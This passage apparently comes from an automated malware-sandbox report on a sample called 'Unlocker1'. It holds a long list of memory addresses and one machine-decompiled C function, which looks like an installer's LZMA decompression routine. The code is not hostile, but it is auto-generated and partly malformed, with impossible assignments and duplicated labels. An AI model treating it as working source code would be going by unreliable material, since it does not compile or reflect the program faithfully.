                                                                                                                                                              0x00405e52
                                                                                                                                                              0x00405e55
                                                                                                                                                              0x00405e59
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405e5f
                                                                                                                                                              0x00405e62
                                                                                                                                                              0x00405e64
                                                                                                                                                              0x00405e65
                                                                                                                                                              0x00405e68
                                                                                                                                                              0x00405e6a
                                                                                                                                                              0x00405e6b
                                                                                                                                                              0x00405e6d
                                                                                                                                                              0x00405e70
                                                                                                                                                              0x00405e75
                                                                                                                                                              0x00405e7a
                                                                                                                                                              0x00405e83
                                                                                                                                                              0x00405e96
                                                                                                                                                              0x00405e99
                                                                                                                                                              0x00405ea5
                                                                                                                                                              0x00405ecd
                                                                                                                                                              0x00405ecf
                                                                                                                                                              0x00405edd
                                                                                                                                                              0x00405edd
                                                                                                                                                              0x00405ee1
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405ed1
                                                                                                                                                              0x00405ed1
                                                                                                                                                              0x00405ed4
                                                                                                                                                              0x00405ed5
                                                                                                                                                              0x00405ed5
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405ed1
                                                                                                                                                              0x00405eab
                                                                                                                                                              0x00405eb0
                                                                                                                                                              0x00405eb0
                                                                                                                                                              0x00405eb9
                                                                                                                                                              0x00405ec1
                                                                                                                                                              0x00405ec4
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405eca
                                                                                                                                                              0x00405eca
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405eca
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405ee7
                                                                                                                                                              0x00405ee7
                                                                                                                                                              0x00405eeb
                                                                                                                                                              0x00406797
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00406797
                                                                                                                                                              0x00405ef4
                                                                                                                                                              0x00405f04
                                                                                                                                                              0x00405f07
                                                                                                                                                              0x00405f0a
                                                                                                                                                              0x00405f0a
                                                                                                                                                              0x00405f0a
                                                                                                                                                              0x00405f0d
                                                                                                                                                              0x00405f11
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405f13
                                                                                                                                                              0x00405f19
                                                                                                                                                              0x00405f43
                                                                                                                                                              0x00405f49
                                                                                                                                                              0x00405f50
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405f50
                                                                                                                                                              0x00405f1f
                                                                                                                                                              0x00405f22
                                                                                                                                                              0x00405f27
                                                                                                                                                              0x00405f27
                                                                                                                                                              0x00405f32
                                                                                                                                                              0x00405f3a
                                                                                                                                                              0x00405f3d
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405f82
                                                                                                                                                              0x00405f88
                                                                                                                                                              0x00405f8b
                                                                                                                                                              0x00405f98
                                                                                                                                                              0x00405fa0
                                                                                                                                                              0x00406614
                                                                                                                                                              0x00406614
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405f57
                                                                                                                                                              0x00405f57
                                                                                                                                                              0x00405f5b
                                                                                                                                                              0x004067a6
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004067a6
                                                                                                                                                              0x00405f67
                                                                                                                                                              0x00405f72
                                                                                                                                                              0x00405f72
                                                                                                                                                              0x00405f72
                                                                                                                                                              0x00405f75
                                                                                                                                                              0x00405f78
                                                                                                                                                              0x00405f7b
                                                                                                                                                              0x00405f80
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00406617
                                                                                                                                                              0x00406617
                                                                                                                                                              0x0040661d
                                                                                                                                                              0x00406623
                                                                                                                                                              0x0040609a
                                                                                                                                                              0x0040609d
                                                                                                                                                              0x004060a0
                                                                                                                                                              0x004060a3
                                                                                                                                                              0x004060a6
                                                                                                                                                              0x004060a9
                                                                                                                                                              0x004060ac
                                                                                                                                                              0x004060c8
                                                                                                                                                              0x004060cb
                                                                                                                                                              0x004060ce
                                                                                                                                                              0x004060d1
                                                                                                                                                              0x004060d8
                                                                                                                                                              0x004060dc
                                                                                                                                                              0x004060de
                                                                                                                                                              0x004060e2
                                                                                                                                                              0x004060ae
                                                                                                                                                              0x004060ae
                                                                                                                                                              0x004060b2
                                                                                                                                                              0x004060ba
                                                                                                                                                              0x004060bf
                                                                                                                                                              0x004060c1
                                                                                                                                                              0x004060c3
                                                                                                                                                              0x004060c3
                                                                                                                                                              0x004060e5
                                                                                                                                                              0x004060ec
                                                                                                                                                              0x004060ef
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004060f5
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004060f5
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004060fa
                                                                                                                                                              0x004060fa
                                                                                                                                                              0x004060fe
                                                                                                                                                              0x004067be
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004067be
                                                                                                                                                              0x00406104
                                                                                                                                                              0x00406107
                                                                                                                                                              0x0040610a
                                                                                                                                                              0x0040610e
                                                                                                                                                              0x00406111
                                                                                                                                                              0x00406117
                                                                                                                                                              0x00406119
                                                                                                                                                              0x00406119
                                                                                                                                                              0x00406119
                                                                                                                                                              0x0040611c
                                                                                                                                                              0x0040611f
                                                                                                                                                              0x0040611f
                                                                                                                                                              0x0040611f
                                                                                                                                                              0x00406125
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00406127
                                                                                                                                                              0x0040612a
                                                                                                                                                              0x0040612d
                                                                                                                                                              0x00406130
                                                                                                                                                              0x00406133
                                                                                                                                                              0x00406136
                                                                                                                                                              0x00406139
                                                                                                                                                              0x0040613c
                                                                                                                                                              0x0040613f
                                                                                                                                                              0x00406142
                                                                                                                                                              0x00406145
                                                                                                                                                              0x0040615d
                                                                                                                                                              0x00406160
                                                                                                                                                              0x00406163
                                                                                                                                                              0x00406166
                                                                                                                                                              0x00406166
                                                                                                                                                              0x00406169
                                                                                                                                                              0x0040616d
                                                                                                                                                              0x0040616f
                                                                                                                                                              0x00406147
                                                                                                                                                              0x00406147
                                                                                                                                                              0x0040614f
                                                                                                                                                              0x00406154
                                                                                                                                                              0x00406156
                                                                                                                                                              0x00406158
                                                                                                                                                              0x00406158
                                                                                                                                                              0x00406172
                                                                                                                                                              0x00406179
                                                                                                                                                              0x0040617c
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040617e
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040617e
                                                                                                                                                              0x0040617c
                                                                                                                                                              0x00406183
                                                                                                                                                              0x00406183
                                                                                                                                                              0x00406183
                                                                                                                                                              0x00406183
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004061be
                                                                                                                                                              0x004061be
                                                                                                                                                              0x004061c2
                                                                                                                                                              0x004067ca
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004067ca
                                                                                                                                                              0x004061c8
                                                                                                                                                              0x004061cb
                                                                                                                                                              0x004061ce
                                                                                                                                                              0x004061d2
                                                                                                                                                              0x004061d5
                                                                                                                                                              0x004061db
                                                                                                                                                              0x004061dd
                                                                                                                                                              0x004061dd
                                                                                                                                                              0x004061dd
                                                                                                                                                              0x004061e0
                                                                                                                                                              0x004061e3
                                                                                                                                                              0x004061e3
                                                                                                                                                              0x004061e9
                                                                                                                                                              0x00406187
                                                                                                                                                              0x00406187
                                                                                                                                                              0x0040618a
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040618a
                                                                                                                                                              0x004061eb
                                                                                                                                                              0x004061eb
                                                                                                                                                              0x004061ee
                                                                                                                                                              0x004061f1
                                                                                                                                                              0x004061f4
                                                                                                                                                              0x004061f7
                                                                                                                                                              0x004061fa
                                                                                                                                                              0x004061fd
                                                                                                                                                              0x00406200
                                                                                                                                                              0x00406203
                                                                                                                                                              0x00406206
                                                                                                                                                              0x00406209
                                                                                                                                                              0x00406221
                                                                                                                                                              0x00406224
                                                                                                                                                              0x00406227
                                                                                                                                                              0x0040622a
                                                                                                                                                              0x0040622a
                                                                                                                                                              0x0040622d
                                                                                                                                                              0x00406231
                                                                                                                                                              0x00406233
                                                                                                                                                              0x0040620b
                                                                                                                                                              0x0040620b
                                                                                                                                                              0x00406213
                                                                                                                                                              0x00406218
                                                                                                                                                              0x0040621a
                                                                                                                                                              0x0040621c
                                                                                                                                                              0x0040621c
                                                                                                                                                              0x00406236
                                                                                                                                                              0x0040623d
                                                                                                                                                              0x00406240
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00406242
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00406242
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004064cf
                                                                                                                                                              0x004064cf
                                                                                                                                                              0x004064d3
                                                                                                                                                              0x004067fa
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004067fa
                                                                                                                                                              0x004064d9
                                                                                                                                                              0x004064dc
                                                                                                                                                              0x004064df
                                                                                                                                                              0x004064e3
                                                                                                                                                              0x004064e6
                                                                                                                                                              0x004064ec
                                                                                                                                                              0x004064ee
                                                                                                                                                              0x004064ee
                                                                                                                                                              0x00406514
                                                                                                                                                              0x00406517
                                                                                                                                                              0x0040651a
                                                                                                                                                              0x0040651d
                                                                                                                                                              0x00406520
                                                                                                                                                              0x00406539
                                                                                                                                                              0x0040653b
                                                                                                                                                              0x0040653e
                                                                                                                                                              0x0040653f
                                                                                                                                                              0x00406542
                                                                                                                                                              0x00406544
                                                                                                                                                              0x00406547
                                                                                                                                                              0x00406549
                                                                                                                                                              0x0040654b
                                                                                                                                                              0x0040654e
                                                                                                                                                              0x00406550
                                                                                                                                                              0x00406553
                                                                                                                                                              0x00406557
                                                                                                                                                              0x00406559
                                                                                                                                                              0x00406559
                                                                                                                                                              0x0040655a
                                                                                                                                                              0x0040655d
                                                                                                                                                              0x00406560
                                                                                                                                                              0x00406522
                                                                                                                                                              0x00406522
                                                                                                                                                              0x0040652a
                                                                                                                                                              0x0040652f
                                                                                                                                                              0x00406531
                                                                                                                                                              0x00406534
                                                                                                                                                              0x00406534
                                                                                                                                                              0x00406563
                                                                                                                                                              0x0040656a
                                                                                                                                                              0x004064f4
                                                                                                                                                              0x004064f4
                                                                                                                                                              0x004064f4
                                                                                                                                                              0x004064f4
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040656c
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040656c
                                                                                                                                                              0x0040656a
                                                                                                                                                              0x0040647d
                                                                                                                                                              0x00406480
                                                                                                                                                              0x00406482
                                                                                                                                                              0x00406485
                                                                                                                                                              0x00406488
                                                                                                                                                              0x0040648b
                                                                                                                                                              0x0040648d
                                                                                                                                                              0x00406490
                                                                                                                                                              0x00406493
                                                                                                                                                              0x00406493
                                                                                                                                                              0x00406496
                                                                                                                                                              0x00406496
                                                                                                                                                              0x00406499
                                                                                                                                                              0x004064a0
                                                                                                                                                              0x00406474
                                                                                                                                                              0x00406474
                                                                                                                                                              0x00406474
                                                                                                                                                              0x00406474
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004064a2
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004064a2
                                                                                                                                                              0x004064a0
                                                                                                                                                              0x00406426
                                                                                                                                                              0x00406429
                                                                                                                                                              0x0040642b
                                                                                                                                                              0x0040642e
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040618d
                                                                                                                                                              0x0040618d
                                                                                                                                                              0x00406191
                                                                                                                                                              0x004067d6
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004067d6
                                                                                                                                                              0x00406197
                                                                                                                                                              0x0040619a
                                                                                                                                                              0x0040619d
                                                                                                                                                              0x004061a0
                                                                                                                                                              0x004061a3
                                                                                                                                                              0x004061a6
                                                                                                                                                              0x004061a9
                                                                                                                                                              0x004061ab
                                                                                                                                                              0x004061ae
                                                                                                                                                              0x004061b1
                                                                                                                                                              0x004061b4
                                                                                                                                                              0x004061b6
                                                                                                                                                              0x004061b6
                                                                                                                                                              0x004061b6
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00406318
                                                                                                                                                              0x00406318
                                                                                                                                                              0x0040631c
                                                                                                                                                              0x004067e2
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004067e2
                                                                                                                                                              0x00406322
                                                                                                                                                              0x00406325
                                                                                                                                                              0x00406328
                                                                                                                                                              0x0040632b
                                                                                                                                                              0x0040632d
                                                                                                                                                              0x0040632d
                                                                                                                                                              0x0040632d
                                                                                                                                                              0x00406330
                                                                                                                                                              0x00406333
                                                                                                                                                              0x00406336
                                                                                                                                                              0x00406339
                                                                                                                                                              0x0040633c
                                                                                                                                                              0x0040633f
                                                                                                                                                              0x00406340
                                                                                                                                                              0x00406342
                                                                                                                                                              0x00406342
                                                                                                                                                              0x00406342
                                                                                                                                                              0x00406345
                                                                                                                                                              0x00406348
                                                                                                                                                              0x0040634b
                                                                                                                                                              0x0040634e
                                                                                                                                                              0x0040634e
                                                                                                                                                              0x0040634e
                                                                                                                                                              0x00406351
                                                                                                                                                              0x00406353
                                                                                                                                                              0x00406353
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00406595
                                                                                                                                                              0x00406595
                                                                                                                                                              0x00406595
                                                                                                                                                              0x00406599
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040659f
                                                                                                                                                              0x004065a2
                                                                                                                                                              0x004065a5
                                                                                                                                                              0x004065a8
                                                                                                                                                              0x004065aa
                                                                                                                                                              0x004065aa
                                                                                                                                                              0x004065aa
                                                                                                                                                              0x004065ad
                                                                                                                                                              0x004065b0
                                                                                                                                                              0x004065b3
                                                                                                                                                              0x004065b6
                                                                                                                                                              0x004065b9
                                                                                                                                                              0x004065bc
                                                                                                                                                              0x004065bd
                                                                                                                                                              0x004065bf
                                                                                                                                                              0x004065bf
                                                                                                                                                              0x004065bf
                                                                                                                                                              0x004065c2
                                                                                                                                                              0x004065c5
                                                                                                                                                              0x004065c8
                                                                                                                                                              0x004065cb
                                                                                                                                                              0x004065ce
                                                                                                                                                              0x004065d2
                                                                                                                                                              0x004065d4
                                                                                                                                                              0x004065d7
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004065d9
                                                                                                                                                              0x00406356
                                                                                                                                                              0x00406356
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00406356
                                                                                                                                                              0x004065d7
                                                                                                                                                              0x0040680c
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405e3b
                                                                                                                                                              0x00406843
                                                                                                                                                              0x00406843
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00406843
                                                                                                                                                              0x00406690
                                                                                                                                                              0x00406617
                                                                                                                                                              0x00406614
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00406369

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.373612481.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Unlocker1.jbxd
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 98%
                                                                                                                                                              			E004062B1() {
                                                                                                                                                              				unsigned short _t531;
                                                                                                                                                              				signed int _t532;
                                                                                                                                                              				void _t533;
                                                                                                                                                              				signed int _t534;
                                                                                                                                                              				signed int _t535;
                                                                                                                                                              				signed int _t565;
                                                                                                                                                              				signed int _t568;
                                                                                                                                                              				signed int _t589;
                                                                                                                                                              				signed int* _t606;
                                                                                                                                                              				void* _t613;
                                                                                                                                                              
                                                                                                                                                              				L0:
                                                                                                                                                              				while(1) {
                                                                                                                                                              					L0:
                                                                                                                                                              					if( *(_t613 - 0x40) != 0) {
                                                                                                                                                              						 *(_t613 - 0x84) = 0xa;
                                                                                                                                                              						_t606 =  *(_t613 - 4) + 0x1b0 +  *(_t613 - 0x38) * 2;
                                                                                                                                                              					} else {
                                                                                                                                                              						 *(__ebp - 0x84) = 9;
                                                                                                                                                              						 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                                                                                                                              					}
                                                                                                                                                              					while(1) {
                                                                                                                                                              						 *(_t613 - 0x54) = _t606;
                                                                                                                                                              						while(1) {
                                                                                                                                                              							L133:
                                                                                                                                                              							_t531 =  *_t606;
                                                                                                                                                              							_t589 = _t531 & 0x0000ffff;
                                                                                                                                                              							_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                                                                                                                                                              							if( *(_t613 - 0xc) >= _t565) {
                                                                                                                                                              								 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                                                                                                                                                              								 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                                                                                                                                                              								 *(_t613 - 0x40) = 1;
                                                                                                                                                              								_t532 = _t531 - (_t531 >> 5);
                                                                                                                                                              								 *_t606 = _t532;
                                                                                                                                                              							} else {
                                                                                                                                                              								 *(_t613 - 0x10) = _t565;
                                                                                                                                                              								 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                                                                                                                              								 *_t606 = (0x800 - _t589 >> 5) + _t531;
                                                                                                                                                              							}
                                                                                                                                                              							if( *(_t613 - 0x10) >= 0x1000000) {
                                                                                                                                                              								goto L139;
                                                                                                                                                              							}
                                                                                                                                                              							L137:
                                                                                                                                                              							if( *(_t613 - 0x6c) == 0) {
                                                                                                                                                              								 *(_t613 - 0x88) = 5;
                                                                                                                                                              								L170:
                                                                                                                                                              								_t568 = 0x22;
                                                                                                                                                              								memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
                                                                                                                                                              								_t535 = 0;
                                                                                                                                                              								L172:
                                                                                                                                                              								return _t535;
                                                                                                                                                              							}
                                                                                                                                                              							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
                                                                                                                                                              							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                                                                                                              							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                                                                                                                              							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                                                                                                                                              							L139:
                                                                                                                                                              							_t533 =  *(_t613 - 0x84);
                                                                                                                                                              							while(1) {
                                                                                                                                                              								 *(_t613 - 0x88) = _t533;
                                                                                                                                                              								while(1) {
                                                                                                                                                              									L1:
                                                                                                                                                              									_t534 =  *(_t613 - 0x88);
                                                                                                                                                              									if(_t534 > 0x1c) {
                                                                                                                                                              										break;
                                                                                                                                                              									}
                                                                                                                                                              									switch( *((intOrPtr*)(_t534 * 4 +  &M0040684B))) {
                                                                                                                                                              										case 0:
                                                                                                                                                              											if( *(_t613 - 0x6c) == 0) {
                                                                                                                                                              												goto L170;
                                                                                                                                                              											}
                                                                                                                                                              											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                                                                                                              											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                                                                                                                              											_t534 =  *( *(_t613 - 0x70));
                                                                                                                                                              											if(_t534 > 0xe1) {
                                                                                                                                                              												goto L171;
                                                                                                                                                              											}
                                                                                                                                                              											_t538 = _t534 & 0x000000ff;
                                                                                                                                                              											_push(0x2d);
                                                                                                                                                              											asm("cdq");
                                                                                                                                                              											_pop(_t570);
                                                                                                                                                              											_push(9);
                                                                                                                                                              											_pop(_t571);
                                                                                                                                                              											_t609 = _t538 / _t570;
                                                                                                                                                              											_t540 = _t538 % _t570 & 0x000000ff;
                                                                                                                                                              											asm("cdq");
                                                                                                                                                              											_t604 = _t540 % _t571 & 0x000000ff;
                                                                                                                                                              											 *(_t613 - 0x3c) = _t604;
                                                                                                                                                              											 *(_t613 - 0x1c) = (1 << _t609) - 1;
                                                                                                                                                              											 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
                                                                                                                                                              											_t612 = (0x300 << _t604 + _t609) + 0x736;
                                                                                                                                                              											if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
                                                                                                                                                              												L10:
                                                                                                                                                              												if(_t612 == 0) {
                                                                                                                                                              													L12:
                                                                                                                                                              													 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
                                                                                                                                                              													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                                                                                                                              													goto L15;
                                                                                                                                                              												} else {
                                                                                                                                                              													goto L11;
                                                                                                                                                              												}
                                                                                                                                                              												do {
                                                                                                                                                              													L11:
                                                                                                                                                              													_t612 = _t612 - 1;
                                                                                                                                                              													 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
                                                                                                                                                              												} while (_t612 != 0);
                                                                                                                                                              												goto L12;
                                                                                                                                                              											}
                                                                                                                                                              											if( *(_t613 - 4) != 0) {
                                                                                                                                                              												GlobalFree( *(_t613 - 4)); // executed
                                                                                                                                                              											}
                                                                                                                                                              											_t534 = GlobalAlloc(0x40, 0x600); // executed
                                                                                                                                                              											 *(_t613 - 4) = _t534;
                                                                                                                                                              											if(_t534 == 0) {
                                                                                                                                                              												goto L171;
                                                                                                                                                              											} else {
                                                                                                                                                              												 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
                                                                                                                                                              												goto L10;
                                                                                                                                                              											}
                                                                                                                                                              										case 1:
                                                                                                                                                              											L13:
                                                                                                                                                              											__eflags =  *(_t613 - 0x6c);
                                                                                                                                                              											if( *(_t613 - 0x6c) == 0) {
                                                                                                                                                              												 *(_t613 - 0x88) = 1;
                                                                                                                                                              												goto L170;
                                                                                                                                                              											}
                                                                                                                                                              											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                                                                                                              											 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
                                                                                                                                                              											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                                                                                                                              											_t45 = _t613 - 0x48;
                                                                                                                                                              											 *_t45 =  *(_t613 - 0x48) + 1;
                                                                                                                                                              											__eflags =  *_t45;
                                                                                                                                                              											L15:
                                                                                                                                                              											if( *(_t613 - 0x48) < 4) {
                                                                                                                                                              												goto L13;
                                                                                                                                                              											}
                                                                                                                                                              											_t546 =  *(_t613 - 0x40);
                                                                                                                                                              											if(_t546 ==  *(_t613 - 0x74)) {
                                                                                                                                                              												L20:
                                                                                                                                                              												 *(_t613 - 0x48) = 5;
                                                                                                                                                              												 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
                                                                                                                                                              												goto L23;
                                                                                                                                                              											}
                                                                                                                                                              											 *(_t613 - 0x74) = _t546;
                                                                                                                                                              											if( *(_t613 - 8) != 0) {
                                                                                                                                                              												GlobalFree( *(_t613 - 8)); // executed
                                                                                                                                                              											}
                                                                                                                                                              											_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
                                                                                                                                                              											 *(_t613 - 8) = _t534;
                                                                                                                                                              											if(_t534 == 0) {
                                                                                                                                                              												goto L171;
                                                                                                                                                              											} else {
                                                                                                                                                              												goto L20;
                                                                                                                                                              											}
                                                                                                                                                              										case 2:
                                                                                                                                                              											L24:
                                                                                                                                                              											_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
                                                                                                                                                              											 *(_t613 - 0x84) = 6;
                                                                                                                                                              											 *(_t613 - 0x4c) = _t553;
                                                                                                                                                              											_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
                                                                                                                                                              											 *(_t613 - 0x54) = _t606;
                                                                                                                                                              											goto L133;
                                                                                                                                                              										case 3:
                                                                                                                                                              											L21:
                                                                                                                                                              											__eflags =  *(_t613 - 0x6c);
                                                                                                                                                              											if( *(_t613 - 0x6c) == 0) {
                                                                                                                                                              												 *(_t613 - 0x88) = 3;
                                                                                                                                                              												goto L170;
                                                                                                                                                              											}
                                                                                                                                                              											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                                                                                                              											_t67 = _t613 - 0x70;
                                                                                                                                                              											 *_t67 =  &(( *(_t613 - 0x70))[1]);
                                                                                                                                                              											__eflags =  *_t67;
                                                                                                                                                              											 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                                                                                                                                              											L23:
                                                                                                                                                              											 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
                                                                                                                                                              											if( *(_t613 - 0x48) != 0) {
                                                                                                                                                              												goto L21;
                                                                                                                                                              											}
                                                                                                                                                              											goto L24;
                                                                                                                                                              										case 4:
                                                                                                                                                              											L133:
                                                                                                                                                              											_t531 =  *_t606;
                                                                                                                                                              											_t589 = _t531 & 0x0000ffff;
                                                                                                                                                              											_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                                                                                                                                                              											if( *(_t613 - 0xc) >= _t565) {
                                                                                                                                                              												 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                                                                                                                                                              												 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                                                                                                                                                              												 *(_t613 - 0x40) = 1;
                                                                                                                                                              												_t532 = _t531 - (_t531 >> 5);
                                                                                                                                                              												 *_t606 = _t532;
                                                                                                                                                              											} else {
                                                                                                                                                              												 *(_t613 - 0x10) = _t565;
                                                                                                                                                              												 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                                                                                                                              												 *_t606 = (0x800 - _t589 >> 5) + _t531;
                                                                                                                                                              											}
                                                                                                                                                              											if( *(_t613 - 0x10) >= 0x1000000) {
                                                                                                                                                              												goto L139;
                                                                                                                                                              											}
                                                                                                                                                              										case 5:
                                                                                                                                                              											goto L137;
                                                                                                                                                              										case 6:
                                                                                                                                                              											__edx = 0;
                                                                                                                                                              											__eflags =  *(__ebp - 0x40);
                                                                                                                                                              											if( *(__ebp - 0x40) != 0) {
                                                                                                                                                              												__eax =  *(__ebp - 4);
                                                                                                                                                              												__ecx =  *(__ebp - 0x38);
                                                                                                                                                              												 *(__ebp - 0x34) = 1;
                                                                                                                                                              												 *(__ebp - 0x84) = 7;
                                                                                                                                                              												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                                                                                                                                              												while(1) {
                                                                                                                                                              													 *(_t613 - 0x54) = _t606;
                                                                                                                                                              													goto L133;
                                                                                                                                                              												}
                                                                                                                                                              											}
                                                                                                                                                              											__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                                                                                                                              											__esi =  *(__ebp - 0x60);
                                                                                                                                                              											__cl = 8;
                                                                                                                                                              											__cl = 8 -  *(__ebp - 0x3c);
                                                                                                                                                              											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                                                                                                                              											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                                                                                                                              											__ecx =  *(__ebp - 0x3c);
                                                                                                                                                              											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                                                                                                                              											__ecx =  *(__ebp - 4);
                                                                                                                                                              											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                                                                                                                              											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                                                                                                                              											__eflags =  *(__ebp - 0x38) - 4;
                                                                                                                                                              											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                                                                                              											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                                                                                              											if( *(__ebp - 0x38) >= 4) {
                                                                                                                                                              												__eflags =  *(__ebp - 0x38) - 0xa;
                                                                                                                                                              												if( *(__ebp - 0x38) >= 0xa) {
                                                                                                                                                              													_t98 = __ebp - 0x38;
                                                                                                                                                              													 *_t98 =  *(__ebp - 0x38) - 6;
                                                                                                                                                              													__eflags =  *_t98;
                                                                                                                                                              												} else {
                                                                                                                                                              													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                                                                                                                              												}
                                                                                                                                                              											} else {
                                                                                                                                                              												 *(__ebp - 0x38) = 0;
                                                                                                                                                              											}
